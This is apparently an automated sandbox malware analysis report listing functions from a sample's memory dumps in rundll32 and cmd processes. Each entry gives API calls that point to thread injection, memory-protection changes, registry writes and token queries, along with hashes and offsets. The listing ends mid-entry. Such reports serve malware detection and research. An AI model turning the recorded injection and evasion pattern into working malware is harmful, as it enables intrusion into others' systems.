Instruction Fuzzy Hash: 4372A371658B098FE7B8EF28ED896A573E1F758300F60457DD44BC35A3EE3899428B81

Uniqueness

Uniqueness Score: -1.00%

Function 0000020FDEABF00B, Relevance: 3.4, APIs: 2, Instructions: 352
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0000020FDEABF298
NtProtectVirtualMemory.NTDLL ref: 0000020FDEABF327

Memory Dump Source

Source File: 00000024.00000002.543191587.0000020FDEABF000.00000040.00020000.sdmp, Offset: 0000020FDEABF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdeabf000_rundll32.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: be7bb458c273f2d2f654f75874fcca03f17dfd030f3d6b03a5112b33d0bc8b69
Instruction ID: 45a1f86a6b00b2ce857e985bca4847cfaff202af73e2dd777fa71b158e2f332d
Opcode Fuzzy Hash: be7bb458c273f2d2f654f75874fcca03f17dfd030f3d6b03a5112b33d0bc8b69
Instruction Fuzzy Hash: 5EB10535248B854FD7B8EF28DC857A9B3E1FB95300F5849BDD08BC7653E638A4468742

Uniqueness

Uniqueness Score: -1.00%

Function 0000020FDEAAAB44, Relevance: 1.8, APIs: 1, Instructions: 286
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE ref: 0000020FDEAAAB9E

Memory Dump Source

Source File: 00000024.00000002.542751757.0000020FDEA81000.00000020.00020000.sdmp, Offset: 0000020FDEA81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdea81000_rundll32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b5832ff44e7a9416d80d201301d07f7436e5bfb8180f97c70cf6f3843a8594b3
Instruction ID: af578b1b818caf586488ee53e57d04c66e882ff2ccbb4680ead3dd6bc12b845a
Opcode Fuzzy Hash: b5832ff44e7a9416d80d201301d07f7436e5bfb8180f97c70cf6f3843a8594b3
Instruction Fuzzy Hash: 91919130358B4A8FF7A8EF68DD8876637D5EB94311F00457EE44AC36A2EE79D8028741

Uniqueness

Uniqueness Score: -1.00%

Function 0000020FDEA81B84, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0000020FDEA81BAA

Memory Dump Source

Source File: 00000024.00000002.542751757.0000020FDEA81000.00000020.00020000.sdmp, Offset: 0000020FDEA81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdea81000_rundll32.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: a47a6288c91f39f2d972061f96e803c24b73f60b47e4bc17258e528937957287
Instruction ID: 4c86535b677b547b4a73062e22553150355e3108e39a50981acf16f4773359d5
Opcode Fuzzy Hash: a47a6288c91f39f2d972061f96e803c24b73f60b47e4bc17258e528937957287
Instruction Fuzzy Hash: 7B018F30258A0A8FEBE8EF69C4CCA2577E5FBA8305B4404BEA409C7151F628D882C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000020FDEA88784, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000020FDEAAD608: RegCreateKeyA.ADVAPI32 ref: 0000020FDEAAD62B

RegQueryValueExA.KERNELBASE ref: 0000020FDEA887F8
RegSetValueExA.KERNELBASE ref: 0000020FDEA88850
RegCloseKey.KERNELBASE ref: 0000020FDEA8885D

Strings

(, xrefs: 0000020FDEA8883C
(, xrefs: 0000020FDEA88804

Memory Dump Source

Source File: 00000024.00000002.542751757.0000020FDEA81000.00000020.00020000.sdmp, Offset: 0000020FDEA81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdea81000_rundll32.jbxd

Similarity

API ID: Value$CloseCreateQuery
String ID: ($(
API String ID: 409396109-222463766
Opcode ID: 6f5cc901afd6a421e113164d0215a0e994425601b987ba33cff0349f0f073630
Instruction ID: f8c60d05edfa818dc5cab0690689a70863fd5af86dc9418735226a449bb2f001
Opcode Fuzzy Hash: 6f5cc901afd6a421e113164d0215a0e994425601b987ba33cff0349f0f073630
Instruction Fuzzy Hash: 26319D306087098FF7A4EF18E889766B7E5F788344F50053DA449C36A2EB789946CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000020FDEA9E8A8, Relevance: 4.6, APIs: 3, Instructions: 96
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExA.KERNELBASE ref: 0000020FDEA9E8E6
RegQueryValueExA.KERNELBASE ref: 0000020FDEA9E925
RegCloseKey.KERNELBASE ref: 0000020FDEA9E953

Memory Dump Source

Source File: 00000024.00000002.542751757.0000020FDEA81000.00000020.00020000.sdmp, Offset: 0000020FDEA81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdea81000_rundll32.jbxd

Similarity

API ID: QueryValue$Close
String ID:
API String ID: 1979452859-0
Opcode ID: a280222c93ffb8a2a1dd04b2f857e1d4dfa6f574689e21c2ed8be034479b1d68
Instruction ID: 3ac10a0921017753eb6e5628b255acf41857b3f3b5852de3ba25f1b01eda0d30
Opcode Fuzzy Hash: a280222c93ffb8a2a1dd04b2f857e1d4dfa6f574689e21c2ed8be034479b1d68
Instruction Fuzzy Hash: 17215330618B098FE794EF28D84D766B7E1FB98311F11846EE44AC3662EB38DD41CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000020FDEAAFBA4, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000020FDEAAFCE1

Strings

H, xrefs: 0000020FDEAAFBC8

Memory Dump Source

Source File: 00000024.00000002.542751757.0000020FDEA81000.00000020.00020000.sdmp, Offset: 0000020FDEA81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdea81000_rundll32.jbxd

Similarity

API ID: LibraryLoad
String ID: H
API String ID: 1029625771-2852464175
Opcode ID: 80515bd0cb8e00cb26f709d7b3957a638bb39c5a71ed7ea779f36b6bc8c5c77c
Instruction ID: a2d6bc8378943f3b992f877fc4e27aa2bf563e78196c065a36c5c33c032a7ecd
Opcode Fuzzy Hash: 80515bd0cb8e00cb26f709d7b3957a638bb39c5a71ed7ea779f36b6bc8c5c77c
Instruction Fuzzy Hash: 93A16430608F0A8FE7A9EF58D88C77577E1FB98305F04456ED849C7662EB38D9468B81

Uniqueness

Uniqueness Score: -1.00%

Function 0000020FDEA8E34C, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 222
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcmp.KERNEL32 ref: 0000020FDEA8E4B9

Strings

, xrefs: 0000020FDEA8E40D

Memory Dump Source

Source File: 00000024.00000002.542751757.0000020FDEA81000.00000020.00020000.sdmp, Offset: 0000020FDEA81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdea81000_rundll32.jbxd

Similarity

API ID: lstrcmp
String ID:
API String ID: 1534048567-3916222277
Opcode ID: 932262b961ec7188e8508585a0e75dfec165fbffc2d36d3813a84719929387ff
Instruction ID: b8397e60719927a6a7f914a3d05a472e6a8c6022601d1916341bb24753159aea
Opcode Fuzzy Hash: 932262b961ec7188e8508585a0e75dfec165fbffc2d36d3813a84719929387ff
Instruction Fuzzy Hash: 34512971648B098BE77CBF189CCA27D73D1F798310F64417ED98AC3692E9299C4287C2

Uniqueness

Uniqueness Score: -1.00%

Function 0000020FDEA8BA3C, Relevance: 3.2, APIs: 2, Instructions: 202
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000020FDEA90770: VirtualProtect.KERNELBASE ref: 0000020FDEA907A3

VirtualProtect.KERNELBASE ref: 0000020FDEA8BB5A
VirtualProtect.KERNELBASE ref: 0000020FDEA8BB7D

Memory Dump Source

Source File: 00000024.00000002.542751757.0000020FDEA81000.00000020.00020000.sdmp, Offset: 0000020FDEA81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdea81000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 537c1354849ecdbf07aa9d2237092f35c30ae36a9baa6ab7a01b3660000cf8bc
Instruction ID: c47e894f2ac4c2b4b4aaf6e4c856a9941368cbe56152505cc494a0340bc6d5a2
Opcode Fuzzy Hash: 537c1354849ecdbf07aa9d2237092f35c30ae36a9baa6ab7a01b3660000cf8bc
Instruction Fuzzy Hash: F6618070658F098FE7A4EF19D8C9765B7E0FB58315F1001AAA44AC3662EB34E941CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000020FDEA9B288, Relevance: 3.1, APIs: 2, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrRChrA.KERNELBASE ref: 0000020FDEA9B2E6
RtlAddVectoredContinueHandler.NTDLL ref: 0000020FDEA9B3DA

Memory Dump Source

Source File: 00000024.00000002.542751757.0000020FDEA81000.00000020.00020000.sdmp, Offset: 0000020FDEA81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdea81000_rundll32.jbxd

Similarity

API ID: ContinueHandlerVectored
String ID:
API String ID: 3758255415-0
Opcode ID: 675295d3ff2ebfd6e1c66cf5e54aad3941e63d7ed530a95736b3b6422c8b3a47
Instruction ID: 08287a148456e1771fa47ce6c8e35c600feddbddab3af347bf3bae7ee13212a5
Opcode Fuzzy Hash: 675295d3ff2ebfd6e1c66cf5e54aad3941e63d7ed530a95736b3b6422c8b3a47
Instruction Fuzzy Hash: 6B51B030648B468FF7E4EB68DC583AE76D1EB98315F44817E980AC3692EB3CC4458B05

Uniqueness

Uniqueness Score: -1.00%

Function 0000020FDEAAD608, Relevance: 3.1, APIs: 2, Instructions: 60
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32 ref: 0000020FDEAAD62B
RegOpenKeyA.ADVAPI32 ref: 0000020FDEAAD638

Memory Dump Source

Source File: 00000024.00000002.542751757.0000020FDEA81000.00000020.00020000.sdmp, Offset: 0000020FDEA81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdea81000_rundll32.jbxd

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 46b1500a05769aa6653957655d5fab6f6f474f3957ccb8ab20a95ee67e5d8d2d
Instruction ID: 6fba00851440db9046c3bf240b535123e9f9eb44bfb2e96aa7dce86942717bb1
Opcode Fuzzy Hash: 46b1500a05769aa6653957655d5fab6f6f474f3957ccb8ab20a95ee67e5d8d2d
Instruction Fuzzy Hash: 1511C8307587458FEB94EF5CD048769B7E4EBEC345F04046DE88DC3261EA74C9418B42

Uniqueness

Uniqueness Score: -1.00%

Function 0000020FDEA90AC0, Relevance: 3.1, APIs: 2, Instructions: 59
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 0000020FDEA90AF0
QueueUserAPC.KERNELBASE ref: 0000020FDEA90B07

Memory Dump Source

Source File: 00000024.00000002.542751757.0000020FDEA81000.00000020.00020000.sdmp, Offset: 0000020FDEA81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdea81000_rundll32.jbxd

Similarity

API ID: CreateQueueThreadUser
String ID:
API String ID: 3600083758-0
Opcode ID: dfb3e466a0a8e86603f8e13fb46ea2a18ab35b8e505637be4548d2ac0a2702aa
Instruction ID: ebb3544065b33e51b3f9adc2fa45d8cb9059b1b68d9ad6b4f59331802350ed93
Opcode Fuzzy Hash: dfb3e466a0a8e86603f8e13fb46ea2a18ab35b8e505637be4548d2ac0a2702aa
Instruction Fuzzy Hash: 61015231714F198FEBA4EF2DA94D73A77E2E798311B24416AA409C3275DE38DC428B81

Uniqueness

Uniqueness Score: -1.00%

Function 0000020FDEA82650, Relevance: 1.7, APIs: 1, Instructions: 216
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 0000020FDEA8279C

Memory Dump Source

Source File: 00000024.00000002.542751757.0000020FDEA81000.00000020.00020000.sdmp, Offset: 0000020FDEA81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdea81000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e913e7bdb883097a3b12cc78823202d948663da0d7e8d3c8fda136f06f28c0dd
Instruction ID: ad711d3615ba6a5eb6334e9c434cda5e3780a21b6f38bb9a724187899c3f7a14
Opcode Fuzzy Hash: e913e7bdb883097a3b12cc78823202d948663da0d7e8d3c8fda136f06f28c0dd
Instruction Fuzzy Hash: 9F615370658F059FEBA8FF18D98966577E0FB68301F50057EE88AC3652EB34E841CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0000020FDEA8AC60, Relevance: 1.7, APIs: 1, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 0000020FDEA8ADA6

Memory Dump Source

Source File: 00000024.00000002.542751757.0000020FDEA81000.00000020.00020000.sdmp, Offset: 0000020FDEA81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdea81000_rundll32.jbxd

Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: 42a7f5bd8b2e472681d41e8399d722f55f865f0ab29f62aa4baf47a3eed3e34d
Instruction ID: 1ee7f2420e7867ea5bab3f0ea8469ec08df5cd1260e3d5ca46bf1b2035c712d6
Opcode Fuzzy Hash: 42a7f5bd8b2e472681d41e8399d722f55f865f0ab29f62aa4baf47a3eed3e34d
Instruction Fuzzy Hash: 1D41B430694E5D8FEBF4FF58D9C866577E1F758310F6001A9E009C36A2EA68DC468791

Uniqueness

Uniqueness Score: -1.00%

Function 0000020FDEA8F6DC, Relevance: 1.6, APIs: 1, Instructions: 80
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000020FDEAAD608: RegCreateKeyA.ADVAPI32 ref: 0000020FDEAAD62B

RegQueryValueExA.KERNELBASE ref: 0000020FDEA8F740

Memory Dump Source

Source File: 00000024.00000002.542751757.0000020FDEA81000.00000020.00020000.sdmp, Offset: 0000020FDEA81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdea81000_rundll32.jbxd

Similarity

API ID: CreateQueryValue
String ID:
API String ID: 2711935003-0
Opcode ID: 066617ecd554d66c8e8d52e55b1cc36a7b34d398eb4d09c7dff54596e5683527
Instruction ID: 3a12886603b48a4819be855405ae6773c8b9510ccb4e6a573e66dc7aaf73c914
Opcode Fuzzy Hash: 066617ecd554d66c8e8d52e55b1cc36a7b34d398eb4d09c7dff54596e5683527
Instruction Fuzzy Hash: 7021013461874D8FE7A0FF68D488B5BB7E1FB98304F50096DA48AC3651EB78D945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000020FDEA90770, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0000020FDEA907A3

Memory Dump Source

Source File: 00000024.00000002.542751757.0000020FDEA81000.00000020.00020000.sdmp, Offset: 0000020FDEA81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdea81000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 34c560a541f8168961c80fa0c2cf80ca2d5f03411010d755178f2bbdc9de7312
Instruction ID: dfb301d05c88f17d646357a62aed1cc8b3091247f596364bd7f53ddb2b17ceac
Opcode Fuzzy Hash: 34c560a541f8168961c80fa0c2cf80ca2d5f03411010d755178f2bbdc9de7312
Instruction Fuzzy Hash: 4F11DA3024CB084FEB64FF58A889525B3D5E798310B50057DDD8EC3246EE74DC45CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0000020FDEA818B4, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 0000020FDEA81905

Memory Dump Source

Source File: 00000024.00000002.542751757.0000020FDEA81000.00000020.00020000.sdmp, Offset: 0000020FDEA81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdea81000_rundll32.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 5f4bc03c9f7741edf4b603b06abe66dffbd698ddb215ced6f46e11268b9e6993
Instruction ID: db62b43d16c674845bbd897f776e25d5585040a110fa6a15b4e15b7bb9fa1046
Opcode Fuzzy Hash: 5f4bc03c9f7741edf4b603b06abe66dffbd698ddb215ced6f46e11268b9e6993
Instruction Fuzzy Hash: 75F0AF30718B0A4BEB98EF69C588B2AB3F1EBD8302F40193DB506C3251DB78C8018B02

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: cmd.exe PID: 6020 Parent PID: 3352 cmd.exeCOMMON

Executed Functions

Function 03051AE3, Relevance: 25.8, APIs: 17, Instructions: 336
memorylibrarynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 030463A7: RtlAllocateHeap.NTDLL(00000000,00000001,030318D4), ref: 030463B3

memset.NTDLL ref: 03051B32

Part of subcall function 0304C92D: GetVersion.KERNEL32(?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 0304C978
Part of subcall function 0304C92D: GetModuleHandleA.KERNEL32(0000170B,?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 0304C9AC

Part of subcall function 0305255F: RtlAllocateHeap.NTDLL(00000000,-00000003,03056104), ref: 03052579

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060,?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 03051B6C
CloseHandle.KERNEL32(0305C0F0,?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 03051B91
GetUserNameA.ADVAPI32(00000000,?,?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 03051BDA
RtlAllocateHeap.NTDLL(00000000,?), ref: 03051BED
NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 03051C32
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 03051C47
CloseHandle.KERNEL32(00000000,?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 03051C5E
memcpy.NTDLL(0305C1E4,?,00000018,?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 03051CBC
RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 03051D69
OpenEventA.KERNEL32(00100000,00000000,0305C0E8,?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 03051D91
GetLastError.KERNEL32(?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 03051DAA
GetLastError.KERNEL32(030411B1,0305C0FC,0305C100,?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 03051E30
LoadLibraryA.KERNEL32(?,030411B1,0305C0FC,0305C100,?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 03051E4B
SetEvent.KERNEL32(?,030526D2,00000000,00000000,?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 03051EE0
RtlAllocateHeap.NTDLL(00000000,00000052,030526D2), ref: 03051EF5
wsprintfA.USER32 ref: 03051F25

Part of subcall function 030338FA: HeapFree.KERNEL32(00000000,00000000,00000000,02F35DF0,00000000,?,?,?,00000000,03051EC1,030526D2,00000000,00000000), ref: 03033970

Part of subcall function 030535FC: HeapFree.KERNEL32(00000000,00000000,00000000,1D4E36C0,00000000,00000000,?,?,?,00000000,03051EC6,030526D2,00000000,00000000), ref: 0305366D

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$Allocate$Handle$CloseErrorEventFreeLastOpenProcess$CreateInformationLibraryLoadModuleMutexNameQueryUserVersionmemcpymemsetwsprintf
String ID:
API String ID: 146269569-0
Opcode ID: d9be06927046563d11d90003bb1c2457eff9c5665a0ce7248f63afbb569f5542
Instruction ID: 7c74403b3e0ccca12d3f1be618dc197199bbc6720f1119085129eed8ab5baa1e
Opcode Fuzzy Hash: d9be06927046563d11d90003bb1c2457eff9c5665a0ce7248f63afbb569f5542
Instruction Fuzzy Hash: BAC1E175603308DFEB64EF69E884A6BBBE8FB45700B44092DF846C7245DB39A844CF65

Uniqueness

Uniqueness Score: -1.00%

Function 030316AF, Relevance: 10.6, APIs: 7, Instructions: 114
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrRChrA.SHLWAPI(0305C16C,00000000,0000005C,?,00000001,0305C1AC,00000000), ref: 030316F2
_strupr.NTDLL ref: 03031708
lstrlen.KERNEL32(0305C16C), ref: 03031710
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,00000001,0305C1AC,00000000), ref: 03031790
RtlAddVectoredExceptionHandler.NTDLL(00000000,0304BB66), ref: 030317B7
GetLastError.KERNEL32(?,?,00000001,0305C1AC,00000000), ref: 030317D1
RtlRemoveVectoredExceptionHandler.NTDLL(0305C0F8), ref: 030317E7

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
String ID:
API String ID: 2251957091-0
Opcode ID: cfc6d115c2157ad93e495bd264adc5552403b14669dde022131c37a7f05c11f1
Instruction ID: fb5bb735dbf11fdc4217935959b18ad34ce33ae641ab52b051f37efb612134bf
Opcode Fuzzy Hash: cfc6d115c2157ad93e495bd264adc5552403b14669dde022131c37a7f05c11f1
Instruction Fuzzy Hash: 9531B2729033149FF754FF78EC84AAFB7ECAB0B754B190629E911E7184D77988808B94

Uniqueness

Uniqueness Score: -1.00%

Function 030529E0, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtOpenProcess.NTDLL(?,00000400,?,0305C1AC), ref: 03052A27
NtOpenProcessToken.NTDLL(?,00000008,?), ref: 03052A3A
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?,00000000), ref: 03052A56

Part of subcall function 030463A7: RtlAllocateHeap.NTDLL(00000000,00000001,030318D4), ref: 030463B3

NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?,?), ref: 03052A73
memcpy.NTDLL(00000000,00000000,0000001C), ref: 03052A80
NtClose.NTDLL(?), ref: 03052A92
NtClose.NTDLL(?), ref: 03052A9C

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: ba794d2991ae08799c5983ca55a4416fc0453d5b2c14754b2ef1740521e5a10a
Instruction ID: 64e933715dceb4f4fd9a623495fe7407271ebcf5f4c5b3f4a221ce25e131c7c9
Opcode Fuzzy Hash: ba794d2991ae08799c5983ca55a4416fc0453d5b2c14754b2ef1740521e5a10a
Instruction Fuzzy Hash: 722116B6A0121DBBDB11EF95DC849DFBFBDEF48740F104426F901E6210E7768A449BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03047523, Relevance: 9.1, APIs: 6, Instructions: 94
threadmemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0304754E
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0304755B
NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 030475E7
GetModuleHandleA.KERNEL32(00000000), ref: 030475F2
RtlImageNtHeader.NTDLL(00000000), ref: 030475FB
RtlExitUserThread.NTDLL(00000000), ref: 03047610

Part of subcall function 03040E02: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03047589,?), ref: 03040E0A
Part of subcall function 03040E02: GetVersion.KERNEL32 ref: 03040E19
Part of subcall function 03040E02: GetCurrentProcessId.KERNEL32 ref: 03040E28
Part of subcall function 03040E02: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 03040E45

Part of subcall function 03047FF4: memcpy.NTDLL(00000000,00000000,?,?,00000000,00000001,?,?,00000000,?,?,?,?,?,03047597,?), ref: 03048053

Part of subcall function 030499FB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,03034D64), ref: 03049A21

Part of subcall function 0304F5F1: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,?,?,0304E52B,00000000,00000000,00000000,00000000,?,0305C1E4,03037294,0305C1E4), ref: 0304F60C
Part of subcall function 0304F5F1: IsWow64Process.KERNEL32(?,00000000,?,00000000,?,?,0304E52B,00000000,00000000,00000000,00000000,?,0305C1E4,03037294,0305C1E4,00000000), ref: 0304F61D
Part of subcall function 0304F5F1: FindCloseChangeNotification.KERNELBASE(?,?,?,0304E52B,00000000,00000000,00000000,00000000,?,0305C1E4,03037294,0305C1E4,00000000,?,?,03044958), ref: 0304F630

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Process$CreateFileModuleOpenThreadTime$ChangeCloseCurrentEventExitFindHandleHeaderHeapImageInformationNameNotificationQuerySystemUserVersionWow64memcpy
String ID:
API String ID: 954712445-0
Opcode ID: 5a9d6c1996350ed6e0dbaa17f7c9b5e459f8cad4383e6a3e63818a2b18aa44fd
Instruction ID: b05e29e945ebc760db62416657c0b9a2517e8c056e31bd4c78d07b66454e6168
Opcode Fuzzy Hash: 5a9d6c1996350ed6e0dbaa17f7c9b5e459f8cad4383e6a3e63818a2b18aa44fd
Instruction Fuzzy Hash: 3131D6B2902318AFCB21EF68DC84EAFB7B8EB44B40B544575E522EB100D774CE40C790

Uniqueness

Uniqueness Score: -1.00%

Function 0303D274, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(00000000,00000402,00000018,00000000,0305C300), ref: 0303D28B

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 9188cb4d4ce515a13348f983f2906cad73c8fdbf927815948f198b1fadbe2f0a
Instruction ID: efd33a689d418e623572772bd6cb4c1d00d9606583f84e10df57af24368f9356
Opcode Fuzzy Hash: 9188cb4d4ce515a13348f983f2906cad73c8fdbf927815948f198b1fadbe2f0a
Instruction Fuzzy Hash: EBF0E2713021199FC760DE9AD888D9BFBBCEB123407004012E800DB311D330E801CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0304511E, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 030463A7: RtlAllocateHeap.NTDLL(00000000,00000001,030318D4), ref: 030463B3

lstrcpy.KERNEL32(?,00000020), ref: 0304521B
lstrcat.KERNEL32(?,00000020), ref: 03045230
lstrcmp.KERNEL32(00000000,?), ref: 03045247
lstrlen.KERNEL32(?), ref: 0304526B

Strings

, xrefs: 030451B4

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: eebbf197a9ffefb6b1785af058de8b647ce8d73ed2941bd9989c4e697ec3e9a9
Instruction ID: c0a5b80707b898c1ae5f4d7cfe10055c242dd0ed44c027089d3388dcf51cb434
Opcode Fuzzy Hash: eebbf197a9ffefb6b1785af058de8b647ce8d73ed2941bd9989c4e697ec3e9a9
Instruction Fuzzy Hash: C45184B1A02208EFDF61DF99C9846ADFBF5FF46314F098066E815AB211C771A751CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0304B1E1, Relevance: 7.6, APIs: 5, Instructions: 129
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32(?,00000000,00000000,?,00000000,030448DE,00000000,030560DC,03051D54,?,00000001,?,?,?,?,030317CA), ref: 0304B1F1
